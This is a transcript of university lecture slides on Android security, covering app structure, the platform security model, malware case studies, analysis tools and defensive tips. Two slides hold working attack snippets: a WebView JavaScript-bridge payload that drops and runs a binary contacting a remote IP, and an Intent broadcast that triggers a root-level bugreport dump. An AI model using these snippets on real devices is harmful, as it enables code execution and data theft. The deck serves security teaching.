Android Security

Transcript

1. Android Security Bob Mingshen Sun [email protected] November 2, 2015

2. 1 1http://blog.applause.com/ android-or-ios-a-multi-stat-head-to-head-battle/2013/04/

3. Introduc on — Android Market Share Android climbed to 79

   percent of smartphone market share in 2013. — Engadget Android dominates 81 percent of world smartphone market. — CNET 2 2CNET Bob (CUHK) Android Security November 2, 2015 3 / 107

4. Introduc on — Android Malware Terrifying new smartphone malware tracks

   your swipes to steal your PIN. — BGR New Windows malware tries to infect Android devices connected to PCs. — PCWorld First Android bootkit malware spotted; reportedly found on over 350,000 mobile devices, most in China. — TNW Bob (CUHK) Android Security November 2, 2015 4 / 107

5. Introduc on — Oldboot Oldboot The Oldboot has infected more

   than 500,000 devices in China. Chinese retailers flashed this bootkit into the boot partition of Android phones they sold. Since the boot partition in Android will be loaded as a read-only RAM disk, all existing antivirus solutions can’t effectively clean it from infected devices. The Oldboot will try to connect with its C&C servers, download adware and install as system applications. It can also execute arbitrary remote commands with root permission. Bob (CUHK) Android Security November 2, 2015 5 / 107

6. Outline I 1 Introduction 2 Background How to Build an

   Android Application? Application Fundamentals APK File Structure Android Architecture Android Platform Security Architecture Distribution Methods of Apps 3 Attacks Android Malware Malware Distribution Vulnerabilities of Android OS Android Apps Security 4 Analysis Tools Bob (CUHK) Android Security November 2, 2015 6 / 107

7. Outline II Tools in Android SDK Static Analysis Dynamic Analysis

   Online Analysis 5 Defense Obfuscation Android NDK Security Tips 6 Conclusion Bob (CUHK) Android Security November 2, 2015 7 / 107

8. Outline 1 Introduction 2 Background How to Build an Android

   Application? Application Fundamentals APK File Structure Android Architecture Android Platform Security Architecture Distribution Methods of Apps 3 Attacks 4 Analysis Tools 5 Defense Bob (CUHK) Android Security November 2, 2015 8 / 107

9. How to Build an Android Applica on? 3 3http://developer.android.com/tools/building/index.html Bob

   (CUHK) Android Security November 2, 2015 9 / 107

10. How to Build an Android Applica on? — Android Project

    Android Project |-- AndroidManifest.xml |-- src/ | `-- package_name/ | `-- MainActivity.java `-- res/ |-- drawable-hdpi/ | `-- ic_launcher.png |-- layout/ | `-- activity_main.xml `-- values/ AndroidManifest.xml describes the fundamental characteristics of the app and defines each of its components. sdk version permission usage src/: main srouce files in Java. res/ drawable pictures application layout in XML string and color definitions in XML Bob (CUHK) Android Security November 2, 2015 10 / 107

11. How to Build an Android Applica on? — Hello World

    IDE: Eclipse with ADT plugin, Android Studio, Android SDK public class MainActivity extends Activity { @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_main); TextView tvHelloWorld = (TextView)findViewById(R.id.tv_hello_world); tvHelloWorld.setText("Hello World"); } } Bob (CUHK) Android Security November 2, 2015 11 / 107

12. How to Build an Android Applica on? — Hello World

    Layout: activity_main.xml <RelativeLayout xmlns:android="http://schemas.android.com/apk/res/android" tools:context=".MainActivity" > <TextView android:id="@+id/tv_hello_world" android:text="TextView" /> </RelativeLayout> Bob (CUHK) Android Security November 2, 2015 12 / 107

13. How to Build an Android Applica on? — Hello World

    AndroidManifest.xml <?xml version="1.0" encoding="utf-8"?> <manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.helloworld" android:versionCode="1" android:versionName="1.0" > <uses-sdk android:minSdkVersion="8" android:targetSdkVersion="18" /> <application android:allowBackup="true" android:icon="@drawable/ic_launcher" android:label="@string/app_name" android:theme="@style/AppTheme" > <activity android:name="com.example.helloworld.MainActivity" android:label="@string/app_name" > <intent-filter> <action android:name="android.intent.action.MAIN" /> <category android:name="android.intent.category.LAUNCHER" </intent-filter> </activity> </application> <uses-permission android:name="android.permission.RECEIVE_SMS" /> Bob (CUHK) Android Security November 2, 2015 13 / 107

14. How to Build an Android Applica on? — Details A

    detailed look at the build process 1 The Android Asset Packaging Tool (aapt) takes resource files and compiles them. 2 aidl tool converts .aidl interfaces. 3 Compile all of Java code into .class files by the Java Compiler. 4 Convert the .class files into Dalvik byte code by the dex tool. 5 Package all non-compiled & compiled resources into an .apk file. Bob (CUHK) Android Security November 2, 2015 14 / 107

15. How to Build an Android Applica on? — Details 4

    A detailed look at the build process (cont.) 6 Sign with a key before installation. 7 Align the file file by zipalign to decrease memory usage. 4http://developer.android.com/tools/building/index.html Bob (CUHK) Android Security November 2, 2015 15 / 107

16. Applica on Fundamentals App components Activities: an activity represent a

    single screen with a user interface. Services: a service is a component that runs in the background to perform long-running operations or to perform work for remote process. Content providers: a content provider manager a shared set of app data. Broadcast receivers: a broadcast receiver is a component that responds to system-wide broadcast announcements. activating components: intent Bob (CUHK) Android Security November 2, 2015 16 / 107

17. Applica on Fundamentals — Ac vity Lifecycle Activity states [7]

    Bob (CUHK) Android Security November 2, 2015 17 / 107

18. Applica on Fundamentals — Ac vity Lifecycle Activity lifecycle methods

    [7] Bob (CUHK) Android Security November 2, 2015 18 / 107

19. Applica on Fundamentals The manifest file declaring components <?xml version="1.0"

    encoding="utf-8"?> <manifest ... > <application android:icon="@drawable/app_icon.png" ... > <activity android:name="com.example.ExampleActivity" android:label="@string/example_label" ... > </activity> ... </application> </manifest> declaring components capabilities <action android:name="android.intent.action.SEND" /> declaring app requirements <uses-permission android:name="android.permission.RECEIVE_SMS" /> Bob (CUHK) Android Security November 2, 2015 19 / 107

20. APK File Structure APK files are a type of archive

    file, specifically in zip format packages based on the JAR file format. $ file facebook.apk facebook.apk: Zip archive data, at least v2.0 to extract $ unzip facebook.apk $ tree facebook facebook/ |-- AndroidManifest.xml |-- classes.dex |-- resources.arsc |-- lib/ |-- asset/ |-- res/ `-- META-INF/ |-- MANIFEST.MF |-- CERT.RSA `-- CERT.SF Bob (CUHK) Android Security November 2, 2015 20 / 107

21. APK File Structure — Details AndroidManifest.xml: compiled AndroidManifest.xml (Android binary

    XML) which is not readable. classes.dex: the classes compiled in the dex file format understandable by the Dalvik virtual machine. META-INF: certificate SHA-1 digest information. lib: native library for different platforms (armeabi, x86, mips). Bob (CUHK) Android Security November 2, 2015 21 / 107

22. Android Architecture Bob (CUHK) Android Security November 2, 2015 22

    / 107

23. Android Architecture Linux Kernel drivers for hardware, networking, file system

    access and inter-process communication Libraries: native libraries, daemons and services (written in C or C++) Android Runtime Dalvik Virtual Machine Supported core libraries Application Framework framework services and libraries (written mostly in Java) most framework code executes in a Dalvik virtual machine. Applications: pre-installed applications & applications from marketplaces. written in Java, executing in Dalvik VM. Bob (CUHK) Android Security November 2, 2015 23 / 107

24. Android Architecture — Dalvik Virtual Machine Dalvik VM is register

    based Java Virtual Machine. Optimized to use less space. Dalvik byte code (.dex file) rather than Java byte code (.class). More… [6] Bob (CUHK) Android Security November 2, 2015 24 / 107

25. Android Pla orm Security Architecture To achieve protecting user data,

    protecting system resources(including the network), providing application isolation, Android provides these key security features: Robust security at the OS level through the Linux kernel Mandatory application sandbox for all applications Secure interprocess communication Application signing Application-defined and user-granted permissions Bob (CUHK) Android Security November 2, 2015 25 / 107

26. Android Pla orm Security Architecture — Sandbox multi-user Linux system

    in which each app is a different user. the system assigns each app a unique Linux user ID. only the user ID assigned to that app can access resources. each process has its own VM. every app runs in its own Linux process. [10 Bob (CUHK) Android Security November 2, 2015 26 / 107

27. Android Pla orm Security Architecture — Inter-process Communica on ICC:

    Inter-component communication IPC: Inter-process communication Why IPC? Each process in its memory address space. Provides data isolation. Prevents harmful interaction. Bob (CUHK) Android Security November 2, 2015 27 / 107

28. Android Pla orm Security Architecture — Inter-component Communica on IPC

    describes the mechanism how different types of android components are communicated. Component View of ICC: Intent between Activity, Service, Content Provider, Broadcast Receiver [5] Bob (CUHK) Android Security November 2, 2015 28 / 107

29. Android Pla orm Security Architecture — Inter-process Communica on GNU/Linux:

    Signal, PIPE, socket, semaphore, message, shared memory. Android: Binder — lightweight RPC (Remote Procedure Communication) mechanism. Bob (CUHK) Android Security November 2, 2015 29 / 107

30. Android Pla orm Security Architecture — Inter-process Communica on ServiceManager:

    manages registered services (registered/delete/query). Service provider: register to ServiceManager Service user: request service from ServiceManager, and execute remote services. Bob (CUHK) Android Security November 2, 2015 30 / 107

31. Android Pla orm Security Architecture — Fine-grained Permission Mechanism accessing

    protected APIs Camera functions Location data (GPS) Bluetooth functions Telephony functions SMS/MMS functions Network/data connections declaring in AndroidManifest.xml explicitly. <uses-permission android:name="android.permission.INTERNET" /> <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" /> <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" /> <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" /> Bob (CUHK) Android Security November 2, 2015 31 / 107

32. Android Pla orm Security Architecture — Applica on Signing The

    Android system requires that all installed applications be digitally signed with a certificate whose private key is held by the application’s developer. All application must be signed. A special debug key for test and debug. Sign with your private key when publishing. Self-signed certificates, no certificate authority is need. Expiration date. Keytool & Jarsigner zipalign Bob (CUHK) Android Security November 2, 2015 32 / 107

33. Android Pla orm Security Architecture — Applica on Signing Motivations

    of APK signing. Update apps. Ensure application is unmodified. Data shared between applications from same developers. Bob (CUHK) Android Security November 2, 2015 33 / 107

34. Distribu on Methods of Apps Google Play (official market) More

    secure, but still have malware. Third-party markets/forums popular in China less limitations a number of malware Bob (CUHK) Android Security November 2, 2015 34 / 107

35. Outline 1 Introduction 2 Background 3 Attacks Android Malware Malware

    Distribution Vulnerabilities of Android OS Android Apps Security 4 Analysis Tools 5 Defense Bob (CUHK) Android Security November 2, 2015 35 / 107

36. Subsection 1 Android Malware

37. Android Malware — Introduc on There is a massive growth

    in the volume of malware families and samples. — Symantec [12] Bob (CUHK) Android Security November 2, 2015 37 / 107

38. Android Malware — Introduc on Top ten app categories with

    the highest percentage of malware. On third-party app stores, the most dangerous is the Games/Arcade & Action category followed by the Photography category. [12] Bob (CUHK) Android Security November 2, 2015 38 / 107

39. Android Malware — Introduc on Third-party app stores hosting the

    most malware from January to June 2013. Although malware slips into Google Play, most malware is hosted on third-party app stores. There are also stores that only host malware. [12] Bob (CUHK) Android Security November 2, 2015 39 / 107

40. Android Malware — Characteriza on Characterized by Malware installation Activation

    Malicious payloads Bob (CUHK) Android Security November 2, 2015 40 / 107

41. Android Malware — Characteriza on Malware installation Repackaging Update attacks

    Drive-by Download Others Bob (CUHK) Android Security November 2, 2015 41 / 107

42. Android Malware — Characteriza on Repackaged Malware Characteristics of repackaged

    malware one of the most common techniques malware piggyback malicious payloads into popular applications Steps download apps disassemble apk file smali/baksmali apktool IDA Pro … enclose malicious payloads re-assemble and submit to official or alternative Android markets. Bob (CUHK) Android Security November 2, 2015 42 / 107

43. Android Malware — Characteriza on Repackaged Malware Case study —

    Flappy Bird [14] massively popular small game on smartphone exactly the same appearance as the original version fake Android Flappy Bird Premium Service Abusers — apps that send messages to premium numbers causing unwanted charges to vimctims’ phone billing especially rampant in app markets in Russia and Vietnam Bob (CUHK) Android Security November 2, 2015 43 / 107

44. Android Malware — Characteriza on Repackaged Malware Case study —

    Flappy Bird [14] read/send text message permission which is not required in the original version send messages to premium numbers (8777 & 8738) connects to a C&C server to receive instructions information leakage Other game repackaged malware Candy Crush Angry Bird Space Temple Run 2 Bob (CUHK) Android Security November 2, 2015 44 / 107

45. Android Malware — Characteriza on Update Attack repackage popular apps

    do not enclose the payload as a whole piggyback an update component tha will fetch or download the malicious payloads at runtime Static scanning? Bob (CUHK) Android Security November 2, 2015 45 / 107

46. Android Malware — Characteriza on Update Attack Case Study —

    BaseBridge update dialogue saying that a new version is available malicious payload will then be installed [15] Bob (CUHK) Android Security November 2, 2015 46 / 107

47. Android Malware — Characteriza on Drive-by Download entice users to

    download “interesting” or “feature-rich” apps GGTracker in-app advertisement Jifake QR code Others spyware fake apps intentional malicious apps rely on the root privilege Bob (CUHK) Android Security November 2, 2015 47 / 107

48. Android Malware — Characteriza on Characterized by Activiation BOOT_COMPLETED SMS_RECEIVED

    ACTION_MAIN events combination Bob (CUHK) Android Security November 2, 2015 48 / 107

49. Android Malware — Characteriza on Characterized by Malicious Payloads privilege

    escalation remote control C&C server botnet financial charge subscribe to premium-rate services information collection SMS messages phone numbers email address installed package list? Bob (CUHK) Android Security November 2, 2015 49 / 107

50. Android Malware — Evolu on From naive repakcaging to sophasticated

    obfuscation DroidKungfu root exploits C&C servers shadow playloads: apk package obfuscation, JNI Bob (CUHK) Android Security November 2, 2015 50 / 107

51. Android Malware — Evolu on Bleeding-edge malware AVPasser: anti-detection Report:

    http://contagiominidump.blogspot.hk/2014/ 01/android-oldboot-mouabads.html Oldboot: bootkit on Android “modify devices’ boot partition and booting script file to launch system service and extract malicious application during the early stage of system’s booting” “Due to the special RAM disk feature of Android devices’ boot partition, all current mobile antivirus product in the world can’t completely remove this Trojan or effectively repair the system.” http://blogs.360.cn/360mobile/2014/01/17/ oldboot-the-first-bootkit-on-android/ Bob (CUHK) Android Security November 2, 2015 51 / 107

52. Android Malware — Distribu on [8] Bob (CUHK) Android Security

    November 2, 2015 52 / 107

53. Subsection 3 Vulnerabili es of Android OS

54. Permission Abuses Android Permission Mechanism request permissions before installation once

    accepted, never ask you again no idea about when/where/how to use these permissions Permission abuses: 37 permissions for a map application. Bob (CUHK) Android Security November 2, 2015 54 / 107

55. Capabili es Leaks Permission re-delegation Malware do not have permission

    to send text. Legitimate application has permission. Legitimate application expose their component to other without verification accidentally. Malware utilize the permission of deputy (legitimate application) to complete the malicious behaviors. [4] Bob (CUHK) Android Security November 2, 2015 55 / 107

56. Collusion A ack malicious applications collude to combine their permissions

    perform actions beyond their individual pervileges Bob (CUHK) Android Security November 2, 2015 56 / 107

57. WebView Vulnerabili es What is WebView? embedded browser in side

    an app web application for cross-platform HTML5 and JavaScript How to enable apps to interact with the web content? Apps -> Web pages apps can invoke JavaScript code into webpages (e.g., load a JavaScript into page) apps can monitor and intercept the events occurred within web pages (e.g., onPageFinished event) Web pages -> Apps apps can register interfaces to WebView (e.g., File operations interface) JavaScript code can invoke these interface (e.g., JavaScript can read/write internal files) Bob (CUHK) Android Security November 2, 2015 57 / 107

58. WebView Vulnerabili es — Thread Models [9] Bob (CUHK) Android

    Security November 2, 2015 58 / 107

59. WebView Vulnerabili es — Case Study Abusing WebView JavaScript Bridges

    <script> function execute(cmdArgs) { return SmokeyBear.getClass() .forName("java.lang.Runtime") .getMethod("getRuntime",null) .invoke(null,null) .exec(cmdArgs); } execute(["/system/bin/sh","-c","echo '"+armBinary+ "' > /data/data/com.example.webviewhack/armB2"]); execute(["chmod","755","/data/data/com.example.webviewhack/armB2"]); var p = execute(["/data/data/com.example.webviewhack/armB2", "192.168.1.116","/mnt/sdcard"]); document.write(getContents(p.getInputStream())); </script> Bob (CUHK) Android Security November 2, 2015 59 / 107

60. Root Exploits What is rooting? Linux root user get around

    any restrictions Why would you root? access entire file system install special apps flash custom ROMs Why wouldn’t you root? void your warranty brick your phone security risk: you may disclose root privilege to malware accidentally Bob (CUHK) Android Security November 2, 2015 60 / 107

61. Root Exploits How to gain root in Android? Linux kernel

    exploits: CVE-2012-0056, CVE-2009-2692. (http://www.cvedetails.com/) Android exploits: GingerBreak, zergRush. Third-party firmware with root privilege. Bob (CUHK) Android Security November 2, 2015 61 / 107

62. Android Apps Security5 data storing data transportation password and authentication

    component capability leaks others 5Claud Xiao. “Android Apps Security in Practice”. In: xKungfu. 2013. Bob (CUHK) Android Security November 2, 2015 62 / 107

63. Android Apps Security — Data storing Data Storing External storage

    (SD card): no permission management read/write anything on external storage Internal storage (SQLite, XML, File): protected by user id need root to access Bob (CUHK) Android Security November 2, 2015 63 / 107

64. Android Apps Security — Data storing Attack Surface: storing privacy

    on SD card. Example: backup data, IM messages, SNS data Problem: can be accessed by others Consequence: privacy leakage Solution: encryption Bob (CUHK) Android Security November 2, 2015 64 / 107

65. Android Apps Security — Data storing Attack Surface: storing dynamic

    payloads on SD card. Example: store downloaded APK, DEX and JAR on SD card and load/install in runtime Problem: manipulated by others Consequence: phishing, malware, privacy Solution: check authority and integrity before installation Bob (CUHK) Android Security November 2, 2015 65 / 107

66. Android Apps Security — Data storing Attack Surface: storing configurations

    on SD card. Example: storing configuration data in plain text Problem: manipulated by others Consequence: phishing, malware, privacy leakage, MITM attack, SQL injection Solution: internal, encryption, check authority and integrity before using Bob (CUHK) Android Security November 2, 2015 66 / 107

67. Android Apps Security — Data storing Attack Surface: world readable/writeable

    internal file Example: sharing data between apps using Context.MODE_WORLD_READABLE || CONTEXT.MODE_WORLD_WRITEABLE Problem: manipulated by others Consequence: privacy leakage Solution: Content Provider, do not set world readable and writeable for internal data Bob (CUHK) Android Security November 2, 2015 67 / 107

68. Android Apps Security — Data storing Attack Surface: storing privacy

    in internal storage Example: password, credit card number in plain text Problem: root to access Consequence: privacy leakage Solution: do not store this information, encryption, other authentication methods Bob (CUHK) Android Security November 2, 2015 68 / 107

69. Android Apps Security — Data transporta on Attack Surface: plain

    text transportation. Example: plain text in transportation for password, session key and privacy Problem: open WiFi, sniffing Consequence: privacy leakage Solution: TLS/SSL Bob (CUHK) Android Security November 2, 2015 69 / 107

70. Example POST /api/checkaccount HTTP/1.1 User-Agent: MomoChat/1.11build Android/12 (LT18i; Android 2.3.4;

    zh_CN) Content-Length: 249 Content-Type: application/x-www-form-urlencoded Host: www.immomo.com:80 Connection: Keep-Alive uid=85dab7d268769df46abe111a82976931&phone_netWork= 2&screen=480x854&model=LT18i&rom=2.3.4&phone_type=G SM&device_type=android&account=xxxxxx&mac=5c%3Ab5%3 A24%3A09%3Ae1%3A58&market_source=1&buildnumber=4.0. 2.A.0.58%2Fxf_v3w&password=xxxxxx&version=12 Bob (CUHK) Android Security November 2, 2015 70 / 107

71. Android Apps Security — Data transporta on Attack Surface: SSL

    certificate Example: trust all certificate Problem: MITM attack Consequence: privacy leakage Solution: CA, keystore Bob (CUHK) Android Security November 2, 2015 71 / 107

72. Android Apps Security — Data transporta on Attack Surface: SMS

    message Example: use SMS message to register, password Problem: send, read, hijack Consequence: privacy leakage Solution: HTTPS Bob (CUHK) Android Security November 2, 2015 72 / 107

73. Android Apps Security — Password Attack Surface: weak password, short

    password, base64, XOR session key: hash(account+password) IMEI, IMSI Bob (CUHK) Android Security November 2, 2015 73 / 107

74. Android Apps Security — Capability Leaks Attack Surface: Intent call

    B => execution call B with parameters => results call B => results fake B => access A’s data fake B => triggered by A, phishing Bob (CUHK) Android Security November 2, 2015 74 / 107

75. Example <receiver android:name=".CitBroadcastReceiver"> <intent-filter> <action android:name="android.provider.Telephony.SECRET_CODE" /> <data android:scheme="android_secret_code" android:host="64663"

    /> <data android:scheme="android_secret_code" android:host="284" /> <data android:scheme="android_secret_code" android:host="6564" /> </intent-filter> </receiver> Bob (CUHK) Android Security November 2, 2015 75 / 107

76. Example if ("284".equals(paramIntent.getData().getHost())) { asyncExecute(new Runnable() { public void run()

    { try { String str = CitBroadcastReceiver.TAG; String[] arrayOfString = new String[3]; arrayOfString[0] = "bugreport"; arrayOfString[1] = ">"; arrayOfString[2] = m_logFileName; CitUtils.rootExecProgram(str, arrayOfString, true); } } }); Bob (CUHK) Android Security November 2, 2015 76 / 107

77. Example Attack: Intent intent = new Intent(); intent.setAction("android.provider.Telephony.SECRET_CODE"); intent.setData(Uri.parse("android_secret_code://284")); sendBroadcast(intent);

    execute bugreport in root priveledge dump system infor into SD Card Bob (CUHK) Android Security November 2, 2015 77 / 107

78. Android Apps Security — Capability Leaks Attack Surface: Intent Solution:

    signature permission checking Bob (CUHK) Android Security November 2, 2015 78 / 107

79. Android Apps Security — Others Attack Surface: Logcat Open WiFi

    WebView Bob (CUHK) Android Security November 2, 2015 79 / 107

80. Outline 1 Introduction 2 Background 3 Attacks 4 Analysis Tools

    Tools in Android SDK Static Analysis Dynamic Analysis Online Analysis 5 Defense Bob (CUHK) Android Security November 2, 2015 80 / 107

81. Tools in Android SDK adb: Android Debug Bridge (adb) is

    a versatile command line tool that lets you communicate with an emulator instance or connected Android-powered device. $ adb install ...apk $ adb shell $ adb pull $ adb push logcat: The Android logging system provides a mechanism for collecting and viewing system debug output. $ adb logcat log information ... Others: aapt: Android Asset Packaging Tool keytool & jarsigner: sign your application zipalign: align the final pacakge Bob (CUHK) Android Security November 2, 2015 81 / 107

82. Sta c Analysis — Fundamentals Recall .java -> .class ->

    classes.dex zip classes.dex into apk file with other resources dex file is bytecode file for Dalvik VM Reverse engineer? .dex format bytecode format instruction formats specifications: https://source.android.com/devices/ tech/dalvik/dalvik-bytecode.html Bob (CUHK) Android Security November 2, 2015 82 / 107

83. Sta c Analysis — smali/baksmali smali/baksmali: https://code.google.com/p/smali/ smali/baksmali is an

    assembler/disassembler for the dex format used by dalvik, Android’s Java VM implementation. Bob (CUHK) Android Security November 2, 2015 83 / 107

84. Sta c Analysis — smali/baksmali HelloWorld application $ unzip HelloWorld.apk

    -d hello_world Archive: HelloWorld.apk inflating: hello_world/res/layout/activity_main.xml inflating: hello_world/classes.dex ... $ java -jar baksmali.jar hello_world/classes.dex $ tree com `-- example `-- helloworld |-- BuildConfig.smali |-- MainActivity.smali |-- R$attr.smali |-- R$dimen.smali |-- R$drawable.smali |-- R$id.smali |-- R$layout.smali |-- R$menu.smali |-- R.smali |-- R$string.smali `-- R$style.smali Bob (CUHK) Android Security November 2, 2015 84 / 107

85. Sta c Analysis — android-apktool apktool is based on smali/baksmali.

    https://code.google.com/p/android-apktool/ It is a tool for reverse engineering 3rd party, closed, binary Android apps. It can decode resources to nearly original form and rebuild them after making some modifications; it makes possible to debug smali code step by step. Also it makes working with app easier because of project-like files structure and automation of some repetitive tasks like building apk, etc. Usage of apktool d[ecode] [OPTS] <file.apk> [<dir>] b[uild] [OPTS] [<app_path>] [<out_file>] Bob (CUHK) Android Security November 2, 2015 85 / 107

86. Sta c Analysis — apktool HelloWorld application $ apktool d

    HelloWorld.apk $ cat MainActivity.smali .class public Lcom/example/helloworld/MainActivity; .super Landroid/app/Activity; .source "MainActivity.java" ... .method protected onCreate(Landroid/os/Bundle;)V ... const-string v1, "Hello World" invoke-virtual {v0, v1}, Landroid/widget/TextView;->setText(Ljava/lang ... Change "Hell World" to "Hey Android". Bob (CUHK) Android Security November 2, 2015 86 / 107

87. Sta c Analysis — apktool HelloWorld application $ apktool b

    HelloWorld $ file HelloWorld/dist/HelloWorld.apk HelloWorld/dist/HelloWorld.apk: Zip archive data, at least v2.0 to extract $ jarsigner ... $ zipalign ... $ adb install HelloWorld.apk Bob (CUHK) Android Security November 2, 2015 87 / 107

88. Sta c Analysis — dex2jar & jd-gui dex2jar: reverse dex

    to class and package into jar. https://code.google. com/p/dex2jar/ jd-gui: JD-GUI is a standalone graphical utility that displays Java source codes of “.class” files. http://jd.benow.ca/ Bob (CUHK) Android Security November 2, 2015 88 / 107

89. Sta c Analysis — androguard Androguard is mainly a tool

    written in python to play with : Dex/Odex (Dalvik virtual machine) (.dex) (disassemble, decompilation), APK (Android application) (.apk), Android’s binary xml (.xml), Android Resources (.arsc). Bob (CUHK) Android Security November 2, 2015 89 / 107

90. Sta c Analysis — androguard Features: map DEX/ODEX/AP- K/AXML/ARSC format

    into Python objects disassemble, decompilation and modification of DEX/ODEX/APK static analysis ipython/Sublime text editor similarity measurement visulizaion Bob (CUHK) Android Security November 2, 2015 90 / 107

91. Dynamic Analysis — DroidBox DroidBox is developed to offer dynamic

    analysis of Android applications. Hashes for the analyzed package Incoming/outgoing network data File read and write operations Started services and loaded classes through DexClassLoader Information leaks via the network, file and SMS Circumvented permissions Cryptography operations performed using Android API Listing broadcast receivers Sent SMS and phone calls Bob (CUHK) Android Security November 2, 2015 91 / 107

92. Dynamic Analysis — TaintDroid TaintDroid: Tracking how apps use sensitive

    information required integrating our software into the Android platform at a low level. http://appanalysis. org/index.html Demo: http: //www.youtube.com/ watch?v=qnLujX1Dw4Y Bob (CUHK) Android Security November 2, 2015 92 / 107

93. Online Analysis Anubis: generate online analysis report. https://anubis.iseclab.org/ VirusTotal: cloud

    detection (almost all detection engines) https://www.virustotal.com/ Bob (CUHK) Android Security November 2, 2015 93 / 107

94. Outline 1 Introduction 2 Background 3 Attacks 4 Analysis Tools

    5 Defense Obfuscation Android NDK Security Tips 6 Conclusion Bob (CUHK) Android Security November 2, 2015 94 / 107

95. Obfusca on — ProGuard ProGuard is a free Java class

    file shrinker, optimizer, obfuscator, and preverifier. It detects and removes unused classes, fields, methods, and attributes. It optimizes bytecode and removes unused instructions. It renames the remaining classes, fields, and methods using short meaningless names. ProGuard can be used for Android obfuscation, and is integrated in Android build system. Bob (CUHK) Android Security November 2, 2015 95 / 107

96. Obfusca on — ProGuard To enable ProGuard, set the proguard.config

    property in the <project_root>/project.properties file. proguard.config=proguard.cfg Bob (CUHK) Android Security November 2, 2015 96 / 107

97. Obfusca on — ProGuard Disassembling obfuscated code. pluginsdk |-- a

    | |-- a.smali | `-- b.smali |-- aa.smali |-- ab.smali |-- ac.smali |-- ad.smali |-- ae.smali |-- af.smali |-- ag.smali |-- ah.smali |-- ai.smali |-- aj.smali |-- ak.smali |-- al.smali |-- am.smali |-- an.smali |-- a.smali |-- b .method public final e(Ljava/lang/Class;)Lb/a .locals 1 .parameter .prologue .line 45 invoke-static {p1}, Lb/a/a/a;->f(Ljava/lang/Class;)Lb/a/a/a/a move-result-object v0 iput-object v0, p0, Lb/a/a/a;->fWt:Lb/a/a/a .line 46 return-object p0 .end method Bob (CUHK) Android Security November 2, 2015 97 / 107

98. Android NDK Android NDK: a toolset that allows you to

    implement parts of your app using native-code languages such as C and C++. http: //developer.android.com/tools/sdk/ndk/index.html difficult to reverse engineer more complex less portable Bob (CUHK) Android Security November 2, 2015 98 / 107

99. Security Tips — Storing Data Using internal storage: By default,

    files on internal storage are accessible only to your app. avoid using the MODE_WORLD_WRITEABLE or MODE_WORLD_READABLE modes cannot limit data access to particular applications cannot control data format encrypt sensitive data Bob (CUHK) Android Security November 2, 2015 99 / 107

100. Security Tips — Storing Data Using external storage: Files on

     external storage (SD Cards) are globally readable and writable. perform input validation avoid putting dynamic payload on external storage verify before loading Bob (CUHK) Android Security November 2, 2015 100 / 107

101. Security Tips — Storing Data Using content providers: offer a

     structured storage mechanism that can be limited to your own application or exported to allow access by other applications. mark android:exported=false android:protectionLevel=signature Bob (CUHK) Android Security November 2, 2015 101 / 107

102. Security Tips from developer.android.com [2] Storing Data Using permissions requesting

     permissions creating permissions Using networking Using IP networking Using telephony networking Performing input validation Handling user data Using WebView Using cryptography Using IPC Dynamically loading code Security in a VM Security in native code Bob (CUHK) Android Security November 2, 2015 102 / 107

103. Conclusion I 1 Introduction 2 Background How to Build an

     Android Application? Application Fundamentals APK File Structure Android Architecture Android Platform Security Architecture Distribution Methods of Apps 3 Attacks Android Malware Malware Distribution Vulnerabilities of Android OS Android Apps Security 4 Analysis Tools Bob (CUHK) Android Security November 2, 2015 103 / 107

104. Conclusion II Tools in Android SDK Static Analysis Dynamic Analysis

     Online Analysis 5 Defense Obfuscation Android NDK Security Tips 6 Conclusion Bob (CUHK) Android Security November 2, 2015 104 / 107

105. References I Qihoo 360. http://blogs.360.cn/360mobile/2014/01/17/oldboot-the- first-bootkit-on-android/. Android. http://developer.android.com/training/articles/security- tips.html. William

     Enck, Peter Gilbert, Byung-Gon Chun, Landon P Cox, Jaeyeon Jung, Patrick McDaniel, and Anmol Sheth. “TaintDroid: An Information-Flow Tracking System for Realtime Privacy Monitoring on Smartphones.” In: OSDI. Vol. 10. 2010, pp. 1–6. Adrienne Porter Felt, Helen J Wang, Alexander Moshchuk, Steve Hanna, and Erika Chin. “Permission Re-Delegation: Attacks and Defenses.” In: USENIX Security Symposium. 2011. Jim Huang. Android IPC Mechanism. http://www.slideshare.net/jserv/android-ipc-mechanism. Bob (CUHK) Android Security November 2, 2015 105 / 107

106. References II Jim Huang. Understanding the Dalvik Virtual Machine. http://www.slideshare.net/jserv/understanding-the-dalvik-

     virtual-machine. Activity Lifecycle. Activity Lifecycle. http://docs.xamarin.com/guides/android/ application_fundamentals/activity_lifecycle/. Lookout. Mobile Threats, Made to Measure. https://www.lookout.com/static/ ee_images/Mobile_Threats_Made_to_Measure_Lookout_Report_2013.pdf. Tongbo Luo, Hao Hao, Wenliang Du, Yifei Wang, and Heng Yin. “Attacks on WebView in the Android system”. In: Proceedings of the 27th Annual Computer Security Applications Conference. ACM. 2011, pp. 343–352. C. Enrique Ortiz. Understanding security on Android. http://www.ibm.com/developerworks/library/x-androidsecurity/. Slashdot. http://beta.slashdot.org/submission/3273305/security- researcher-found-the-first-android-bootkit-in-the-wild. Bob (CUHK) Android Security November 2, 2015 106 / 107

107. References III Symantec. Mobile Adware and Malware Analysis. http://www.symantec.com/content/en/us/enterprise/media/security_ response/whitepapers/madware_and_malware_analysis.pdf.

     Claud Xiao. “Android Apps Security in Practice”. In: xKungfu. 2013. Veo Zhang. Trojanized Flappy Bird Comes on the Heels of Takedown by App Creator. http://blog.trendmicro.com/trendlabs-security- intelligence/trojanized-flappy-bird-comes-on-the-heels-of- takedown-by-app-creator/. Yajin Zhou and Xuxian Jiang. “Dissecting android malware: Characterization and evolution”. In: Security and Privacy (SP), 2012 IEEE Symposium on. IEEE. 2012, pp. 95–109. Bob (CUHK) Android Security November 2, 2015 107 / 107